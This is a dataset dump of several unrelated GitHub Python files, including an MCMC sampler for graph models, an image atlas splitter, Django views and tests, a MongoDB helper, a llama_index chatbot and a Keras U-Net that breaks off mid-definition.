sigmaprop * log(tauprop)\n else:\n logalphaprop = logalpha + .02 * np.random.normal()\n alphaprop = exp(logalphaprop)\n rate_K = exp(logalphaprop - log(-sigmaprop) + sigmaprop * log(tauprop + 2. * sum_w + 2. * w_rem))\n num_clust = np.random.poisson(rate_K)\n if num_clust == 0:\n wprop_rem = 0\n else:\n wprop_rem = np.random.gamma(-sigmaprop * num_clust, 1. / (tauprop + 2. * sum_w + 2. * w_rem))\n else:\n alphaprop = alpha\n logalphaprop = logalpha\n wprop_rem = GGPsumrnd(alphaprop, sigmaprop, tauprop + 2. * sum_w + 2. * w_rem)\n\n # compute the acceptance probability\n sum_wprop = np.sum(w)\n sumall_wprop = sum_wprop + wprop_rem\n\n temp1 = -sumall_wprop ** 2. + sumall_w ** 2. + (sigma - sigmaprop) * np.sum(logw) \\\n - (tauprop - tau - 2. * wprop_rem + 2. * w_rem) * sum_w\n temp2 = K * (gammaln(1. - sigma) - gammaln(1. - sigmaprop))\n\n logaccept = temp1 + temp2\n if estimate_alpha:\n if rw_alpha == 0:\n logaccept += K * (\n log(GGPpsi((2. * sum_wprop + 2. * wprop_rem) / tau, 1., sigma, 1.)) + sigma * log(tau) - log(\n (GGPpsi((2. * sum_w + 2. * w_rem) / tauprop, 1., sigmaprop, 1.))) - sigmaprop * log(tauprop))\n else:\n logaccept -= exp(logalphaprop + sigmaprop * log(tauprop)) * GGPpsi(\n (2. * sum_w + 2. * w_rem) / tauprop, 1., sigmaprop, 1.) + exp(logalpha + sigma * log(tau)) * GGPpsi(\n (2. * sum_wprop + 2. * wprop_rem) / tau, 1., sigma, 1.)\n + K * (logalphaprop - logalpha)\n if hyper_alpha[0] > 0:\n logaccept += hyper_alpha[0] * (logalphaprop - logalpha)\n if hyper_alpha[1] > 0:\n logaccept -= hyper_alpha[1] * (alphaprop - alpha)\n\n logaccept -= GGPpsi(2. * sum_w + 2. * w_rem, alphaprop, sigmaprop, tauprop) + GGPpsi(\n 2. * sum_wprop + 2. * wprop_rem, alpha, sigma, tau)\n\n if estimate_tau:\n logaccept += hyper_tau[0] * (log(tauprop) - log(tau)) - hyper_tau[1] * (tauprop - tau)\n if estimate_sigma:\n logaccept += hyper_sigma[0] * (log(1. - sigmaprop) - log(1. - sigma)) - hyper_sigma[1] * (\n 1. - sigmaprop - 1. + sigma)\n\n if np.isnan(logaccept):\n raise Exception(\"Cannot compute acceptance probability\")\n\n if log(np.random.random()) < logaccept:\n w_rem = wprop_rem\n alpha = alphaprop\n logalpha = logalphaprop\n sigma = sigmaprop\n tau = tauprop\n rate2 = min(1., exp(logaccept))\n\n return w_rem, alpha, logalpha, sigma, tau, rate2\n\n\ndef GGPgraphmcmc(G, modelparam, mcmcparam, typegraph, verbose=True):\n \"\"\"\n Run MCMC for the GGP graph model\n\n\n Convert the same function used in BNPGraph matlab package by Francois Caron\n http://www.stats.ox.ac.uk/~caron/code/bnpgraph/index.html\n\n :param G:sparse logical adjacency matrix\n :param modelparam: dictionary of model parameters with the following fields:\n - alpha: if scalar, the value of alpha. If vector of length\n 2, parameters of the gamma prior over alpha\n - sigma: if scalar, the value of sigma. If vector of length\n 2, parameters of the gamma prior over (1-sigma)\n - tau: if scalar, the value of tau. If vector of length\n 2, parameters of the gamma prior over tau\n :param mcmcparam: dictionary of mcmc parameters with the following fields:\n - niter: number of MCMC iterations\n - nburn: number of burn-in iterations\n - thin: thinning of the MCMC output\n - leapfrog.L: number of leapfrog steps\n - leapfrog.epsilon: leapfrog stepsize\n - leapfrog.nadapt: number of iterations for adaptation (default:nburn/2)\n - latent.MH_nb: number of MH iterations for latent (if 0: Gibbs update)\n - hyper.MH_nb: number of MH iterations for hyperparameters\n - hyper.rw_std: standard deviation of the random walk\n - store_w: logical. If true, returns MCMC draws of w\n :param typegraph: type of graph ('undirected' or 'simple') simple graph does\n not contain any self-loop\n :param verbose: logical. If true (default), print informatio\n :return:\n - samples: dictionary with the MCMC samples for the variables\n - w\n - w_rem\n - alpha\n - logalpha\n - sigma\n - tau\n - stats: dictionary with summary stats about the MCMC algorithm\n - w_rate: acceptance rate of the HMC step at each iteration\n - hyper_rate: acceptance rate of the MH for the hyperparameters at\n each iteration\n \"\"\"\n\n # if not G is G.T or not len(np.unique(G.data)) != 1:\n # raise Exception(\"Adjacency matrix G must be a symmetric binary matrix\")\n\n if typegraph is 'simple':\n issimple = True\n else:\n issimple = False\n\n if not np.iterable(modelparam['alpha']):\n alpha = modelparam['alpha']\n estimated_alpha = 0\n else:\n alpha = 100. * np.random.random()\n estimated_alpha = 1\n\n logalpha = log(alpha)\n\n if not np.iterable(modelparam['sigma']):\n sigma = modelparam['sigma']\n estimated_sigma = 0\n else:\n sigma = 2. * np.random.random() - 1.\n estimated_sigma = 1\n\n if not np.iterable(modelparam['tau']):\n tau = modelparam['tau']\n estimated_tau = 0\n else:\n tau = 10. * np.random.random()\n estimated_tau = 1\n\n K = G.shape[0] # nodes\n\n if issimple:\n G2 = triu(G + G.T, k=1)\n else:\n G2 = triu(G + G.T, k=0)\n\n ind1, ind2 = G2.nonzero()\n\n n = np.random.randint(1, 9, size=len(ind1))\n count = csr_matrix((n, (ind1, ind2)), (K, K), dtype=int)\n N = count.sum(0).T + count.sum(1)\n w = np.random.gamma(1., 1., size=K)\n logw = log(w)\n w_rem = np.random.gamma(1., 1.)\n\n # parameters of the MCMC algorithm\n niter = mcmcparam['niter']\n nburn = mcmcparam['nburn']\n thin = mcmcparam['thin']\n L = mcmcparam['leapfrog.L']\n epsilon = mcmcparam['leapfrog.epsilon'] / K ** (1. / 4.)\n\n # To store MCMC samples\n n_samples = int((niter - nburn) / thin)\n w_st = np.zeros((n_samples, K))\n w_rem_st = np.zeros(n_samples)\n alpha_st = np.zeros(n_samples)\n logalpha_st = np.zeros(n_samples)\n tau_st = np.zeros(n_samples)\n sigma_st = np.zeros(n_samples)\n\n rate = np.zeros(niter)\n rate2 = np.zeros(niter)\n\n tic = time.time()\n for i in range(niter):\n if verbose and i % 2000 == 0:\n print('Iteration=%d' % i, flush=True)\n print('\\talpha = %.2f' % alpha, flush=True)\n print('\\tsigma = %.3f' % sigma, flush=True)\n print('\\ttau = %.3f' % tau, flush=True)\n\n # update w using Hamiltonian Monte Carlo\n w, logw, rate[i] = update_w(w, logw, w_rem, N, L, epsilon, sigma, tau, issimple)\n if i < mcmcparam['leapfrog.nadapt']:\n epsilon = exp(log(epsilon) + .01 * (np.mean(rate[:i]) - 0.6))\n\n # update w_rem and hyperparameters using Metropolis-Hastings\n if i % 2 == 0:\n rw_alpha = True\n else:\n rw_alpha = False\n\n w_rem, alpha, logalpha, sigma, tau, rate2[i] = update_hyper(w, logw, w_rem, alpha, logalpha, sigma, tau,\n mcmcparam['hyper.MH_nb'], mcmcparam['hyper.rw_std'],\n estimated_alpha, estimated_sigma, estimated_tau,\n modelparam['alpha'], modelparam['sigma'],\n modelparam['tau'],\n rw_alpha)\n\n if mcmcparam['latent.MH_nb'] == 0:\n N, n, count = update_n_Gibbs(logw, n, K, count, ind1, ind2)\n else:\n N, n, count = update_n_MH(logw, n, K, count, ind1, ind2, mcmcparam['latent.MH_nb'])\n\n if np.isnan(alpha):\n raise Exception('alpha is not a number')\n\n # Print text at start\n if i == 10:\n toc = (time.time() - tic) * niter / 10.\n hours = np.floor(toc / 3600)\n minutes = (toc - hours * 3600.) / 60.\n print('-----------------------------------', flush=True)\n print('Start MCMC for GGP graphs', flush=True)\n print('Nb of nodes: %d - Nb of edges: %d' % (K, G2.sum()), flush=True)\n print('Number of iterations: %d' % niter, flush=True)\n print('Estimated computation time: %.0f hour(s) %.0f minute(s)' % (hours, minutes), flush=True)\n print('Estimated end of computation: ', time.strftime('%b %dth, %H:%M:%S', time.localtime(tic + toc)),\n flush=True)\n print('-----------------------------------', flush=True)\n\n if i > nburn and (i - nburn) % thin == 0:\n ind = int((i - nburn) / thin)\n if mcmcparam['store_w']:\n w_st[ind] = w\n w_rem_st[ind] = w_rem\n logalpha_st[ind] = logalpha\n alpha_st[ind] = alpha\n sigma_st[ind] = sigma\n tau_st[ind] = tau\n\n samples = dict()\n samples['w'] = w_st\n samples['w_rem'] = w_rem_st\n samples['alpha'] = alpha_st\n samples['logalpha'] = logalpha_st\n samples['sigma'] = sigma_st\n samples['tau'] = tau_st\n\n stats = dict()\n stats['w_rate'] = rate\n stats['hyper_rate'] = rate2\n\n toc = time.time() - tic\n hours = np.floor(toc / 3600)\n minutes = (toc - hours * 3600.) / 60.\n print('-----------------------------------', flush=True)\n print('End MCMC for GGP graphs', flush=True)\n print('Computation time: %.0f hour(s) %.0f minute(s)' % (hours, minutes), flush=True)\n print('End of computation: ', time.strftime('%b %dth, %H:%M:%S', time.localtime(time.time())), flush=True)\n print('-----------------------------------', flush=True)\n\n return samples, stats\n","repo_name":"dongwookim-ml/sparse-graph-prior","sub_path":"sgp/GGPgraphmcmc.py","file_name":"GGPgraphmcmc.py","file_ext":"py","file_size_in_byte":14953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"19648644943","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nimport sys\nimport os.path\nimport shutil\nfrom PIL import Image\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--name\")\nargs = parser.parse_args()\n\nfileName = args.name\n\nif fileName.find('.png') != -1:\n fileName = fileName[:-4]\n\npngName = fileName + '.png'\natlasName = fileName + '.atlas'\n\nprint(pngName, atlasName)\n\nbig_image = Image.open(pngName)\n\n\ncurPath = os.getcwd() # 当前路径\naim_path = os.path.join(curPath, fileName)\nprint(aim_path)\nif os.path.isdir(aim_path):\n shutil.rmtree(aim_path, True) # 如果有该目录,删除\nos.makedirs(aim_path)\n#\ncontent = \"\"\nwith open(atlasName, encoding='utf-8') as fp:\n while True:\n c = fp.readline()\n if len(c) == 0:\n break\n content += c\n\ndata = json.loads(content)\n\nfor k in data[\"frames\"].keys():\n print(k)\n #{'frame': {'x': 572, 'y': 668, 'w': 260, 'h': 127, 'idx': 0}, 'spriteSourceSize': {'x': 68, 'y': 226}, 'sourceSize': {'w': 500, 'h': 500}}\n frame = data[\"frames\"][k][\"frame\"]\n print(data[\"frames\"][k])\n width = frame[\"w\"]\n height = frame[\"h\"]\n ltx = frame[\"x\"]\n lty = frame[\"y\"]\n rbx = ltx+width\n rby = lty+height\n result_image = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n rect_on_big = big_image.crop((ltx, lty, rbx, rby))\n result_image.paste(rect_on_big, (0, 0, width, height))\n result_image.save(aim_path+'/'+k)\n\ndel big_image\n","repo_name":"ankye/croppng","sub_path":"src/atlas.py","file_name":"atlas.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32947184363","text":"from django.test import TestCase\nfrom .models import Feature\n\nclass TestViews(TestCase):\n def test_get_features_page(self):\n page = self.client.get(\"/features/\")\n self.assertEqual(page.status_code, 200)\n self.assertTemplateUsed(page, \"features.html\")\n \n def get_feature_detail_page(self):\n feature = Feature({\"name\":\"test\", \"description\":\"description\"})\n feature.save()\n page = self.client.get(\"/feature/{0}\".format(feature.id))\n self.assertEqual(page.status_code, 200)\n self.assertTemplateUsed(page, \"featuredetail.html\")\n \n def test_get_page_for_feature_that_does_not_exist(self):\n page = self.client.get(\"/feature/10\")\n self.assertEqual(page.status_code, 404)\n \n def create_feature_page(self):\n page = self.client.get(\"/feature/new\")\n self.assertEqual(page.status_code, 200)\n self.assertTemplateUsed(page, 'featureform.html')","repo_name":"dougd94/UnicornAttractor","sub_path":"features/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34709909161","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport pysolr\n#from pymongo import MongoClient\n\nfrom db.db_helper import mongodb_helper\nfrom se.similarity import knn\nimport settings\nfrom se.statistics import distribution\n\n\n__author__ = 'sheep'\n\n\ndef search(request):\n filtered = []\n if 'q' in request.GET:\n solr = pysolr.Solr('http://localhost:8983/solr/gettingstarted/',\n timeout=10)\n keywords = request.GET['q']\n results = solr.search(keywords)\n\n vector_coll = mongodb_helper.get_coll(settings.VECTOR_COLL)\n for r in results:\n if vector_coll.find_one({'id': r['business_id'][0]}) is not None:\n filtered.append(r)\n\n return render(request, 'se.html', {'rests': filtered})\n\ndef detail(request, rest_id):\n business_coll = mongodb_helper.get_coll(settings.BUSINESS_COLL)\n rest_info = business_coll.find_one({'business_id': rest_id})\n vector_coll = mongodb_helper.get_coll(settings.VECTOR_COLL)\n rest_vec = vector_coll.find_one({'id': rest_id})\n\n knn_ids = [id_ for _, id_ in knn.by_euclidean_distance(rest_id)]\n knn_infos = [business_coll.find_one({'business_id': id_})\n for id_ in knn_ids]\n categories = rest_info['categories']\n knn_cat_dist = []\n for cat, score in distribution.category_distribution(knn_ids):\n if cat in categories:\n knn_cat_dist.append((cat, score, True))\n continue\n knn_cat_dist.append((cat, score, False))\n return render(request, 'rest.html', {'rest_info': rest_info,\n 'rest_vec': rest_vec,\n 'knn_infos': knn_infos,\n 'knn_cat_dist': knn_cat_dist})\n","repo_name":"cuc496/word2vecOfYelp","sub_path":"se/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36929640594","text":"#!/usr/local/bin/python3\n\nimport cv2\nimport numpy as np\nimport os\nfrom os.path import isfile, join\n\n# Source code based on: https://medium.com/@iKhushPatel/convert-video-to-images-images-to-video-using-opencv-python-db27a128a481\n\nclass Imgs2vid:\n @staticmethod\n def create_video(input_folder_name, output_file_name, fps):\n frame_array = []\n\n files = [f for f in os.listdir(input_folder_name) if isfile(join(input_folder_name, f))]\n\n # for sorting the file names properly\n files.sort(key=lambda x: x[5:-4])\n files.sort()\n\n frame_array = []\n\n files = [f for f in os.listdir(input_folder_name) if isfile(join(input_folder_name, f))]\n\n # for sorting the file names properly\n files.sort(key=lambda x: x[5:-4])\n\n for i in range(len(files)):\n filename = input_folder_name + files[i]\n\n # reading each files\n img = cv2.imread(filename)\n height, width, layers = img.shape\n size = (width, height)\n\n # inserting the frames into an image array\n frame_array.append(img)\n\n out = cv2.VideoWriter(output_file_name, cv2.VideoWriter_fourcc(*'DIVX'), fps, size)\n\n for i in range(len(frame_array)):\n # writing to a image array\n out.write(frame_array[i])\n \n out.release()\n","repo_name":"V0XNIHILI/csv2ir","sub_path":"Imgs2vid.py","file_name":"Imgs2vid.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26447197560","text":"import pymongo\n\nclass MDBCtrl:\n ### empty init\n __userinfo = dict()\n __dbname,__colname = \"socool\", \"anaresults\"\n\n ### contain init\n def __init__(self, **userinfo):\n __userinfo = userinfo\n\n def setUserInfo(self, port = 27017, host = \"127.0.0.1\"):\n __userinfo = { \"port\" : port , \"host\" : host}\n\n def setDBCollections(self, dbname = 'socool', colname = \"anaresults\"):\n __dbname = dbname\n __colname = colname\n\n def findOneDocu(self, condition):\n bReturn = False\n Res = None\n\n try:\n client = pymongo.MongoClient(**self.__userinfo)\n collect = client[self.__dbname][self.__colname]\n Res = collect.find_one(condition)\n bReturn = True\n\n except Exception as e:\n print(\"Find One Document Fail\")\n\n finally:\n return bReturn, Res\n\n def findManyDocu(self, condition, page, ppc = 10):\n bReturn = False\n Res = None\n\n try:\n client = pymongo.MongoClient(**self.__userinfo)\n collect = client[self.__dbname][self.__colname]\n\n res_pageCount = collect.find(condition).count()\n res_pageCount = 0 if res_pageCount < 1 else ((res_pageCount - 1) // ppc) + 1\n\n res_contents = collect.find(condition).sort('date', -1).skip(page * ppc).limit(ppc)\n bReturn = True\n\n except Exception as e:\n print(\"Find Many Document Fail\")\n\n finally:\n return bReturn, res_pageCount, res_contents\n\n def insertOneDocu(self, docu):\n bReturn = False\n\n try:\n client = pymongo.MongoClient(**self.__userinfo)\n collect = client[self.__dbname][self.__colname]\n collect.insert_one(docu)\n bReturn = True\n\n except Exception as e:\n print(\"Insert One Document Fail\")\n\n finally:\n return bReturn\n\n def insertManyDocu(self, list0):\n bReturn = False\n\n try:\n client = pymongo.MongoClient(**self.__userinfo)\n collect = client[self.__dbname][self.__colname]\n\n except Exception as e:\n print(\"Insert Many Document Fail\")\n return False\n\n for zxc0 in range(1):\n if type(list0) != list:\n break\n\n bReturn = True\n\n for docu in list0:\n if type(docu) != dict:\n bReturn = False\n break\n\n if bReturn != False:\n break\n\n collect.insert_many(list0)\n return bReturn\n\n def updateOneDocu(self, condition, replace):\n bReturn = False\n\n try:\n client = pymongo.MongoClient(**self.__userinfo)\n collect = client[self.__dbname][self.__colname]\n\n if type(condition) == dict and type(replace) == dict:\n collect.update_one(filter=condition, update={\"$set\": replace})\n bReturn = True\n\n except Exception as e:\n print(\"Update One Document Fail\")\n\n finally:\n return bReturn","repo_name":"CHKim777/final_1","sub_path":"machine/mongoDBController.py","file_name":"mongoDBController.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"75210786231","text":"#字典 dict 符号{} 无序\n# 1:可以存在空字典a =[]\n# 2:字典里面数据存储的方式 key:value\n# 3:字典里面的元素 根据逗号来进行分隔\n# 4: 字典里面value可以包含任何类型的数据\n\n\na = {}\nprint(type(a))\na = {\"class\":\"python11\",\n \"student\":119,\n \"teacher\":\"girl\",\n \"t_age\":20,\n \"score\":[99,88,100,5]}\n\n#字典取值: 字典[key]\nprint(a[\"score\"])\n\n#删除 pop(key)\nres = a.pop(\"teacher\")\nprint(res)\n\n#新增值 a[新key]=value 字典里面不存在的key\na[\"name\"] = \"华华\"\nprint(a)\n\n#修改 a[已存在的key] =新value 字典里面不存在的key\na[\"name\"] = \"华华\"\nprint(a)\n\n\n\n","repo_name":"gouyanzhan/daily-learnling","sub_path":"class_02/class_dict.py","file_name":"class_dict.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19054125222","text":"import time\n\nfrom selenium.webdriver.common.by import By\n\n\ndef submit_send(driver):\n try:\n button = driver.find_element(By.NAME, 'submit')\n button.click()\n time.sleep(1)\n except Exception as e:\n print(\"Submit Send Exception: {0} Message: {1}\".format(\"my message\", str(e)))\n","repo_name":"tixuz/openemis_utils","sub_path":"selenium_example/fun_submit_send.py","file_name":"fun_submit_send.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33829569055","text":"import re\nfrom pathlib import Path\n\nfrom regex_search import regex_search\n\n\ndef test_regex_search():\n phone_regex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))? # area code\n (\\s|-|\\.)? # separator\n (\\d{3}) # first 3 digits\n (\\s|-|\\.) # separator\n (\\d{4}) # last 4 digits\n (\\s*(ext|x|ext.)\\s*(\\d{2,5}))? # extension\n )''', re.VERBOSE)\n\n matches = regex_search.regex_search(phone_regex, Path('./regex_search/sample_data/'))\n\n assert len(matches) == 3\n assert 'Phone: 987-654-3210' in matches\n assert 'ph: 555-555-5555' in matches\n assert 'phone: 444-444-4444' in matches\n","repo_name":"zspatter/automate-the-boring-stuff","sub_path":"regex_search/test_regex_search.py","file_name":"test_regex_search.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"95"} +{"seq_id":"38133036305","text":"import os\nimport re\nimport setuptools\n\nNAME=\"keypad\"\nMETA_PATH = os.path.join(NAME, \"__init__.py\")\nMETA_FILE = open(META_PATH, \"r\").read()\n\ndef find_meta(meta):\n \"\"\"\n Extract __*meta*__ from META_FILE.\n \"\"\"\n meta_match = re.search(\n r\"^__{meta}__ = ['\\\"]([^'\\\"]*)['\\\"]\".format(meta=meta),\n META_FILE, re.M\n )\n if meta_match:\n return meta_match.group(1)\n raise RuntimeError(\"Unable to find __{meta}__ string.\".format(meta=meta))\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"micropython-\"+NAME,\n version=find_meta(\"version\"),\n license=find_meta(\"license\"),\n author=\"Petr Kracik\",\n author_email=\"petrkr@petrkr.net\",\n description=\"Keypad library generic matrix keypads\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/octopuslab-cz/micropython-\"+NAME,\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Development Status :: 3 - Alpha\",\n ],\n python_requires='>=3.4'\n)\n","repo_name":"octopuslab-cz/micropython-keypad","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"5336516083","text":"from llama_index import SimpleDirectoryReader, GPTVectorStoreIndex, PromptHelper, ServiceContext, StorageContext, set_global_service_context, load_index_from_storage\nfrom langchain.chat_models import ChatOpenAI\nimport gradio as gr\nimport sys\nimport os\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n\ndef initLogging():\n sys.stdout = sys.stderr\n\ndef initOpenAI(max_tokens):\n llm = ChatOpenAI(temperature=0, model_name=\"gpt-3.5-turbo\", max_tokens=max_tokens)\n set_global_service_context(ServiceContext.from_defaults(llm=llm))\n\ndef readDocumentsFromDisk(docs_dir):\n return SimpleDirectoryReader(input_dir=docs_dir, recursive=True).load_data()\n\ndef indexDocuments(documents):\n return GPTVectorStoreIndex.from_documents(documents, show_progress=True)\n\ndef saveIndexToDisk(index, index_dir):\n index.storage_context.persist(index_dir)\n\ndef readIndexFromDisk(index_dir):\n storage_context = StorageContext.from_defaults(persist_dir=index_dir)\n return load_index_from_storage(storage_context)\n\ndef indexDocumentsAndSave(index_dir):\n documents = readDocumentsFromDisk()\n index = indexDocuments(documents)\n saveIndexToDisk(index, index_dir)\n return index\n\ndef createChatEngine(index):\n return index.as_chat_engine(chat_mode=\"best\")\n\nsys.stdout = sys.stderr\n\nprint(\"Starting bootstrap\")\n\nDOCS_DIR = '/docs'\nINDEX_DIR = '/index'\nMAX_TOKENS = 512\n\ninitLogging()\ninitOpenAI(MAX_TOKENS)\n\nnumDocs = len(os.listdir(INDEX_DIR))\nindex = readIndexFromDisk(INDEX_DIR) if numDocs > 0 else indexDocumentsAndSave(INDEX_DIR)\n\nchat_engine = createChatEngine(index)\n\ndef chatbot(input_text):\n return chat_engine.chat(input_text).response\n\n# gr.ChatInterface(chatbot, title=\"Maia's Custom-trained AI Chatbot\").launch(share=True)\n\niface = gr.Interface(fn=chatbot,\n inputs=gr.components.Textbox(lines=7, label=\"Enter your text\"),\n outputs=\"text\",\n title=\"Maia's Custom-trained AI Chatbot\")\n\niface.launch(server_port=7860, share=True)\n","repo_name":"jcheroske/custom-gpt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34560382816","text":"\"\"\"jukifyservice URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom jukifyservice import views, views_usage_data\n\nurlpatterns = [\n url(r'^admin', admin.site.urls),\n url(r'^login', views.login),\n url(r'^user', include([\n url(r'all', views.list_users),\n url(r'(?P<user_id>[\\w]+)', include([\n url(r'groups$', views.list_groups_from_user),\n url(r'fetch', include([\n url(r'saved-tracks$', views_usage_data.save_saved_tracks),\n url(r'top-artists$', views_usage_data.save_top_artists_tracks),\n url(r'top-tracks$', views_usage_data.save_top_tracks),\n url(r'playlists$', views_usage_data.save_playlists),\n ])),\n ])),\n ])),\n url(r'^group', include([\n url(r'^$', views.groups),\n url(r'(?P<group_id>[0-9]+)$', views.group_users),\n url(r'(?P<group_id>[0-9]+)/playlist$', views.group_playlist),\n url(r'(?P<group_id>[0-9]+)/recommendations$', views.group_recommendations),\n ]))\n]\n","repo_name":"jukify/jukify-service","sub_path":"jukifyservice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2579502747","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 11 18:36:05 2017\r\n\r\n@author: Michał\r\n\"\"\"\r\nimport numpy as np\r\n\r\nfrom keras import backend as K\r\nK.set_image_dim_ordering('th')\r\nimport os \r\nfrom keras.models import Model\r\nfrom keras.layers import merge\r\nfrom keras.layers import Conv2D, MaxPooling2D,UpSampling2D,Input\r\nfrom keras.optimizers import Adam\r\n\r\n\r\n\r\nsmooth = 1.\r\n\r\ndef dice_coef(y_true, y_pred):\r\n y_true_f = K.flatten(y_true)\r\n y_pred_f = K.flatten(y_pred)\r\n intersection = K.sum(y_true_f * y_pred_f)\r\n return (2. * intersection + smooth) / (K.sum(y_true_f*y_true_f) + K.sum(y_pred_f*y_pred_f) + smooth)\r\n\r\n\r\ndef dice_coef_loss(y_true, y_pred):\r\n return 1.-dice_coef(y_true, y_pred)\r\n\r\nclass NeuralNetwork():\r\n \r\n def __init__(self):\r\n\r\n self.net=Model(inputs=[], outputs=[])\r\n\r\n \r\n \r\n def save(self,file):\r\n self.net.save(file)\r\n \r\n def save_weights(self,file):\r\n self.net.save_weights(file)\r\n \r\n \r\n def create(self,size=(28,28,1)):\r\n inputs=Input((size[2],size[0],size[1]))\r\n #self.net.add(Conv2D(64, (4,4), activation='relu',padding='same', input_shape=(size[2],size[0],size[1])))\r\n #self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n #self.net.add(Conv2D(32, (3,3),padding='same', activation='relu'))\r\n #self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n #self.net.add(Conv2D(16, (3,3),padding='same', activation='relu'))\r\n #self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n \r\n #self.net.add(Conv2D(16, (3,3),padding='same', activation='relu'))\r\n #self.net.add(UpSampling2D(size=(2,2)))\r\n \r\n #self.net.add(Conv2D(32, (3,3),padding='same', activation='relu'))\r\n #self.net.add(UpSampling2D(size=(2,2))) \r\n \r\n #self.net.add(Conv2D(64,(4,4),padding='same', activation='relu'))\r\n #self.net.add(UpSampling2D(size=(2,2)))\r\n #self.net.add(Conv2D(32, 2, 2, activation='relu', input_shape=(size[2],size[0],size[1])))\r\n \r\n #self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n \r\n #self.net.add(Conv2D(16, 2, 2, activation='relu', input_shape=(size[2],size[0],size[1])))\r\n \r\n # self.net.add(MaxPooling2D(pool_size=(2,2)))\r\n \r\n #self.net.add(Dropout(0.5))\r\n \r\n # self.net.add(Flatten())\r\n\r\n # self.net.add(Dense(size[0]*size[1], activation='relu'))\r\n \r\n #self.net.add(Conv2D(1,(1,1),padding='same',activation='softmax'))\r\n \r\n \r\n conv1 = Conv2D(16, (3, 3), activation='relu', padding='same')(inputs)\r\n conv1 = Conv2D(16, (3, 3), activation='relu', padding='same')(conv1)\r\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n\r\n conv2 = Conv2D(32, (3, 3), activation='relu', padding='same')(pool1)\r\n conv2 = Conv2D(32, (3, 3), activation='relu', padding='same')(conv2)\r\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n\r\n conv3 = Conv2D(64, (3, 3), activation='relu', padding='same')(pool2)\r\n conv3 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv3)\r\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\r\n \r\n conv4 = Conv2D(128, (3, 3), activation='relu', padding='same')(pool3)\r\n conv4 = Conv2D(128, (3, 3), activation='relu', padding='same')(conv4)\r\n pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)\r\n \r\n conv5 = Conv2D(256, (3, 3), activation='relu', padding='same')(pool4)\r\n conv5 = Conv2D(256, (3, 3), activation='relu', padding='same')(conv5)\r\n \r\n #up6 = concatenate([UpSampling2D(size=(2, 2))(conv5), conv4], axis=3)\r\n up6 = merge([UpSampling2D(size=(2, 2))(conv5), conv4], mode='concat', concat_axis=1)\r\n conv6 = Conv2D(128, (3, 3), activation='relu', padding='same')(up6)\r\n conv6 = Conv2D(128, (3, 3), activation='relu', padding='same')(conv6)\r\n \r\n # up7 = concatenate([UpSampling2D(size=(2, 2))(conv6), conv3], axis=3)\r\n up7=merge([UpSampling2D(size=(2, 2))(conv6), conv3], mode='concat', concat_axis=1)\r\n conv7 = Conv2D(64, (3, 3), activation='relu', padding='same')(up7)\r\n conv7 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv7)\r\n\r\n #up8 = concatenate([UpSampling2D(size=(2, 2))(conv7), conv2], 